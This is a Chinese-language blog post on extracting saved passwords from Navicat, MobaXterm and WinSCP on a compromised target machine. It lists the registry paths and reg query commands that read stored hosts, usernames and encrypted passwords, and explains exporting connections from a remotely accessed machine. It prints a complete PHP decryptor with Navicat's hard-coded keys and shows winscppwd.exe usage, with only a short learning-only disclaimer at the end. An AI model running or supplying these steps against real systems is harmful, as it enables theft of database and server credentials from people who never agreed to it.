之前有发过关于xshell&finalshell密码破解的文章,本文将继续对一些其他常见的连接工具进行讨论,如有错误,欢迎留言指出!
一、Navicat密码破解:
Navicat针对不同的数据库,它所存放的地点是不一样的:
MySQL-->:HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers MariaDB-->:HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMARIADB\Servers MicrosoftSQL-->:HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMSSQL\Servers Oracle-->:HKEY_CURRENT_USER\Software\PremiumSoft\NavicatOra\Servers PostgreSQL-->:HKEY_CURRENT_USER\Software\PremiumSoft\NavicatPG\Servers SQLite-->:HKEY_CURRENT_USER\Software\PremiumSoft\NavicatSQLite\Servers
以mysql为例:
reg query "HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers"
列出了保存过密码的连接:
查找关键值:host、UserName、pwd
reg query "HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\127.0.0.1" /s /v host reg query "HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\127.0.0.1" /s /v username reg query "HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\127.0.0.1" /s /v pwd
将pwd的值拿去解密即可
如果远程登陆到了目标机器,可以直接导出已保存的连接:
勾选:导出密码
然后会导出为.ncx的文件,打开查看其内容如下:关键字:UserName="xx" Password="xx"
而Password是加密的,要做的就是破解这个密码,github上已有大佬写好了破解脚本,copy-->edit-->run即可,修改最后几行代码即可,脚本内容如下:
<?php class NavicatPassword { protected $version = 0; protected $aesKey = 'libcckeylibcckey'; protected $aesIv = 'libcciv libcciv '; protected $blowString = '3DC5CA39'; protected $blowKey = null; protected $blowIv = null; public function __construct($version = 12) { $this->version = $version; $this->blowKey = sha1('3DC5CA39', true); $this->blowIv = hex2bin('d9c7c3c8870d64bd'); } public function encrypt($string) { $result = FALSE; switch ($this->version) { case 11: $result = $this->encryptEleven($string); break; case 12: $result = $this->encryptTwelve($string); break; default: break; } return $result; } protected function encryptEleven($string) { $round = intval(floor(strlen($string) / 8)); $leftLength = strlen($string) % 8; $result = ''; $currentVector = $this->blowIv; for ($i = 0; $i < $round; $i++) { $temp = $this->encryptBlock($this->xorBytes(substr($string, 8 * $i, 8), $currentVector)); $currentVector = $this->xorBytes($currentVector, $temp); $result .= $temp; } if ($leftLength) { $currentVector = $this->encryptBlock($currentVector); $result .= $this->xorBytes(substr($string, 8 * $i, $leftLength), $currentVector); } return strtoupper(bin2hex($result)); } protected function encryptBlock($block) { return openssl_encrypt($block, 'BF-ECB', $this->blowKey, OPENSSL_RAW_DATA|OPENSSL_NO_PADDING); } protected function decryptBlock($block) { return openssl_decrypt($block, 'BF-ECB', $this->blowKey, OPENSSL_RAW_DATA|OPENSSL_NO_PADDING); } protected function xorBytes($str1, $str2) { $result = ''; for ($i = 0; $i < strlen($str1); $i++) { $result .= chr(ord($str1[$i]) ^ ord($str2[$i])); } return $result; } protected function encryptTwelve($string) { $result = openssl_encrypt($string, 'AES-128-CBC', $this->aesKey, OPENSSL_RAW_DATA, $this->aesIv); return strtoupper(bin2hex($result)); } public function decrypt($string) { $result = FALSE; switch ($this->version) { case 11: $result = $this->decryptEleven($string); break; case 12: $result = $this->decryptTwelve($string); break; default: break; } return $result; } protected function decryptEleven($upperString) { $string = hex2bin(strtolower($upperString)); $round = intval(floor(strlen($string) / 8)); $leftLength = strlen($string) % 8; $result = ''; $currentVector = $this->blowIv; for ($i = 0; $i < $round; $i++) { $encryptedBlock = substr($string, 8 * $i, 8); $temp = $this->xorBytes($this->decryptBlock($encryptedBlock), $currentVector); $currentVector = $this->xorBytes($currentVector, $encryptedBlock); $result .= $temp; } if ($leftLength) { $currentVector = $this->encryptBlock($currentVector); $result .= $this->xorBytes(substr($string, 8 * $i, $leftLength), $currentVector); } return $result; } protected function decryptTwelve($upperString) { $string = hex2bin(strtolower($upperString)); return openssl_decrypt($string, 'AES-128-CBC', $this->aesKey, OPENSSL_RAW_DATA, $this->aesIv); } }; //需要指定版本两种,11或12 //$navicatPassword = new NavicatPassword(11); $navicatPassword = new NavicatPassword(11); //解密 //$decode = $navicatPassword->decrypt('15057D7BA390'); $decode = "密码:".$navicatPassword->decrypt('获取到的密码'); echo $decode."\n"; ?>
推荐一个在线运行脚本的网站:https://tool.lu/coderunner/
直接将脚本内容复制,修改注释的地方,运行即可获取到密码:
二、MobaXterm密码获取:
设置-->配置
然后点击显示密码即可直接看到明文密码:
个人版测试不行,专业版应该是可以的:
三、winscp密码获取:
1、首先对方的winscp要设置保存密码:
2、Winscp保存密码存储的位置:
默认情况下,Winscp配置会存储在Windows对应的注册表项下(包括了连接的IP、用户名、密码
Hash),注册表项是固定的
HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
3、获取保存的连接信息:
reg query "HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions"
查询到保存的连接:
reg query "HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\root@192.168.136.144"
指定某个连接,导出其保存的详细信息:
然后利用winscppwd.exe进行破解:
winscppwd.exe <UserName> <HostName> <Password>
破解成功:
如果远程登陆到了目标,可以导出文件进行解密:
导出的文件为.ini后缀,直接用winscppwd.exe对.ini文件进行解密即可:
winscppwd.exe xx.ini
解密成功:
如果管理员自定义了保存密码文件的路径,可以尝试查找winscp.ini文件,将其拖回本地进行解密
密码破解的工具,后台留言winscppwd即可获取
文章和工具仅作为学习和讨论使用,禁止利用其进行任何违法行为,与作者无关!
